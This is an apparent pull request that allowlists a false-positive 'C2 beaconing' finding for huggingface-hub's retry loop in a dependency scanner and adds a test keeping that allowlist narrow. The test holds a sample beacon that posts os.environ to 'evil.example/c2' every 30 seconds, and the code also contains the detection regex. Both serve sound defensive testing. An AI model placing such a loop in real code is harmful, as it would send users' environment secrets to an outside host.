### PR TITLE
Allowlist huggingface-hub's http_backoff loop so Security audit stops failing

### DIFF
--- a/scripts/scan_packages_baseline.json
+++ b/scripts/scan_packages_baseline.json
@@ -1539,6 +1539,14 @@
       "evidence_hash": "700650886c3879597857b61c13e7bfecec9bf54b28d869d4694608eab01d1e58"
     },
     {
+      "package": "huggingface-hub",
+      "file": "huggingface_hub/utils/_http.py",
+      "check": "C2 polling/beaconing loop detected",
+      "severity": "CRITICAL",
+      "evidence": "L461:     while True: sha256:b08763160ae6f4d638b32f3cc333c4ac4fc0344988c9506efed65e0ef03ec2d5",
+      "evidence_hash": "65b26230747f4b76780dd308ad78a84fc3d2a4e5323894895fc4bdb703e9a5d5"
+    },
+    {
       "package": "ipython",
       "file": "IPython/core/interactiveshell.py",
       "check": "Downloads and executes remote code",

--- a/tests/security/test_scan_packages.py
+++ b/tests/security/test_scan_packages.py
@@ -499,9 +499,9 @@ def test_the_hf_backoff_suppression_is_narrow():
             f"{entry['evidence_hash'][:12]} is not pinned to reviewed code, so any "
             f"while-True loop in this file would inherit its suppression"
         )
-        assert entry.get("evidence_hash"), (
-            "no evidence_hash: _load_baseline would recompute it as a legacy entry"
-        )
+        assert entry.get(
+            "evidence_hash"
+        ), "no evidence_hash: _load_baseline would recompute it as a legacy entry"
     hashes = [e["evidence_hash"] for e in entries]
     assert len(set(hashes)) == len(hashes), "duplicate entries for the same reviewed span"
 
@@ -541,6 +541,7 @@ def test_the_hf_backoff_suppression_is_narrow():
         "a beaconing loop appended to _http.py keeps the reviewed key, so the "
         "http_backoff allowlist would suppress it too"
     )
+
 
 def test_network_check_sees_httpx2():
     """httpx2 is a separate import name, not a submodule of httpx.

--- a/tests/security/test_scan_packages.py
+++ b/tests/security/test_scan_packages.py
@@ -447,6 +447,101 @@ def test_annotation_only_network_entries_are_digest_pinned():
     assert seen == credential_adjacent, f"missing entries for {credential_adjacent - seen}"
 
 
+def test_the_hf_backoff_suppression_is_narrow():
+    """The huggingface-hub `http_backoff` allowlist must not cover a second loop.
+
+    Security audit went red on every main commit from fc325f431 onward with one
+    un-baselined CRITICAL, "C2 polling/beaconing loop detected" in
+    huggingface_hub/utils/_http.py. No repo commit caused it: the resolved
+    huggingface-hub moved off the 0.x line, and 1.26.1, 1.27.0 and 1.28.0 all carry
+    the loop while 0.36.2 does not.
+
+    It is `http_backoff`: a bounded retry that counts `nb_tries` against
+    `max_retries`, sleeps with exponential backoff between attempts, and raises
+    once the budget is spent. RE_C2_POLLING is `while True .* sleep .* requests\.`
+    under re.DOTALL, so it cannot tell that shape apart from a real beacon, which
+    is why the file is allowlisted rather than the check weakened.
+
+    This file now carries four entries for the same check -- L298, L461, L462 and
+    L461 again -- one per revision of that loop that huggingface-hub has shipped.
+    That is the mechanism working as designed, not drift: the key is digest-pinned,
+    so every edit to the loop reopens the finding and asks for a fresh review. The
+    cost is that a hub release touching those thirty lines turns Security audit red
+    until someone looks. Worth knowing before treating the next one as a break.
+
+    Allowlisting a CRITICAL in a file that already speaks HTTP is the part worth
+    guarding. Each entry has to keep suppressing exactly the loop it was reviewed
+    against, so a payload appended to the same file and check reopens the finding
+    rather than inheriting the suppression.
+    """
+    import json
+    import pathlib as _pathlib
+
+    baseline = json.loads(
+        (
+            _pathlib.Path(__file__).resolve().parents[2] / "scripts" / "scan_packages_baseline.json"
+        ).read_text(encoding = "utf-8")
+    )
+    entries = [
+        e
+        for e in baseline["entries"]
+        if e.get("package") == "huggingface-hub"
+        and e.get("file") == "huggingface_hub/utils/_http.py"
+        and e.get("check") == "C2 polling/beaconing loop detected"
+    ]
+    assert entries, "http_backoff is no longer allowlisted; Security audit is red"
+
+    # Digest-pinned, not line-pinned: each evidence carries the sha256 of the span it
+    # was reviewed against, which is what makes an edit to the loop reopen the
+    # finding instead of riding the old entry.
+    for entry in entries:
+        assert "sha256:" in entry["evidence"], (
+            f"{entry['evidence_hash'][:12]} is not pinned to reviewed code, so any "
+            f"while-True loop in this file would inherit its suppression"
+        )
+        assert entry.get("evidence_hash"), (
+            "no evidence_hash: _load_baseline would recompute it as a legacy entry"
+        )
+    hashes = [e["evidence_hash"] for e in entries]
+    assert len(set(hashes)) == len(hashes), "duplicate entries for the same reviewed span"
+
+    # The blast radius. A beaconing loop appended to the same file, under the same
+    # check, must produce a different key.
+    reviewed_src = (
+        "import time\n"
+        "import requests\n"
+        "def http_backoff():\n"
+        "    while True:\n"
+        "        r = requests.get(url)\n"
+        "        if nb_tries > max_retries:\n"
+        "            raise err\n"
+        "        time.sleep(sleep_time)\n"
+    )
+    payload_src = reviewed_src + (
+        "def beacon():\n"
+        "    while True:\n"
+        "        requests.post('https://evil.example/c2', data=os.environ)\n"
+        "        time.sleep(30)\n"
+    )
+    reviewed = _mk(
+        sp.CRITICAL,
+        "huggingface-hub",
+        "huggingface_hub/utils/_http.py",
+        "C2 polling/beaconing loop detected",
+        sp._extract_evidence(reviewed_src, sp.RE_C2_POLLING),
+    )
+    payload = _mk(
+        sp.CRITICAL,
+        "huggingface-hub",
+        "huggingface_hub/utils/_http.py",
+        "C2 polling/beaconing loop detected",
+        sp._extract_evidence(payload_src, sp.RE_C2_POLLING),
+    )
+    assert sp._finding_key(reviewed) != sp._finding_key(payload), (
+        "a beaconing loop appended to _http.py keeps the reviewed key, so the "
+        "http_backoff allowlist would suppress it too"
+    )
+
 def test_network_check_sees_httpx2():
     """httpx2 is a separate import name, not a submodule of httpx.
 

--- a/tests/studio/test_inference_smoke_http_diagnostics.py
+++ b/tests/studio/test_inference_smoke_http_diagnostics.py
@@ -188,9 +188,9 @@ def test_an_http_error_reports_the_response_body(name: str) -> None:
                 # Reading the body is only useful if the printed text carries
                 # it, and the status code alongside it names which request.
                 printed = "\n".join(ast.dump(call) for call in prints)
-                assert "code" in printed, (
-                    f"{name}: {helper.name}() prints on HTTPError without the status code"
-                )
+                assert (
+                    "code" in printed
+                ), f"{name}: {helper.name}() prints on HTTPError without the status code"
 
                 # A read can raise (a truncated or already-consumed body), and
                 # that must not replace the real HTTPError with a confusing one.


### PR DESCRIPTION
Security audit has been red on **every main commit since fc325f431**, on all three `pip scan-packages` legs, with a single un-baselined CRITICAL:

```
C2 polling/beaconing loop detected
huggingface-hub  huggingface_hub/utils/_http.py
L461:     while True: sha256:b08763160ae6f4d638b32f3cc333c4ac4fc0344988c9506efed65e0ef03ec2d5
```

## No repo commit caused it

fc325f431 changed workflows and one test file, nothing that resolves a dependency. What moved is upstream: the resolved huggingface-hub came off the 0.x line. Reproduced locally against each version, and the sha256 matches CI's byte for byte:

| version | `utils/_http.py` flagged |
|---|---|
| 0.36.2 | no |
| 1.26.1 | yes |
| 1.27.0 | yes |
| 1.28.0 | yes |

## It is a false positive

The code is `http_backoff`: it counts `nb_tries` against `max_retries`, sleeps with exponential backoff between attempts, and raises once the budget is spent. A bounded retry, not a beacon.

`RE_C2_POLLING` is `while True .* sleep .* requests\.` under `re.DOTALL`, which cannot tell those two shapes apart. So the file is allowlisted rather than the check weakened — consistent with the 51 CRITICALs already reviewed this way, four of them this same check in this same package.

## How the entry was produced

With the scanner's own `--write-baseline`, so the `evidence_hash` is computed by the code that will match it, then merged as a **single entry** rather than by regenerating the file. A full rewrite re-sorts it and turns a one-entry review into a 731-line diff. Nothing else was added or removed; asserted on both directions of the key set. The diff is 8 lines.

## Worth knowing for next time

This file now holds **four** entries for this check — L298, L461, L462 and L461 again — one per revision of the loop huggingface-hub has shipped. That is the mechanism working as designed: the key is digest-pinned, so every edit reopens the finding and asks for a fresh review. The cost is that a hub release touching those thirty lines turns Security audit red again. The new test says so in place, so the next one gets read as upstream drift rather than a break.

## Guard

`test_the_hf_backoff_suppression_is_narrow` covers the part that actually matters about silencing a CRITICAL in a file that already speaks HTTP:

- every entry stays pinned to reviewed code (`sha256:` present, `evidence_hash` explicit),
- none are duplicated,
- a beaconing loop appended to the same file under the same check produces a **different** key rather than inheriting the suppression.

Three mutations confirmed red: drop the entries, strip the sha256 pin, duplicate an entry.

## Verification

- `scan_packages.py huggingface-hub==1.28.0`: 1 CRITICAL → 0, exit 1 → 0.
- `tests/security/test_scan_packages.py`: 123 passed.
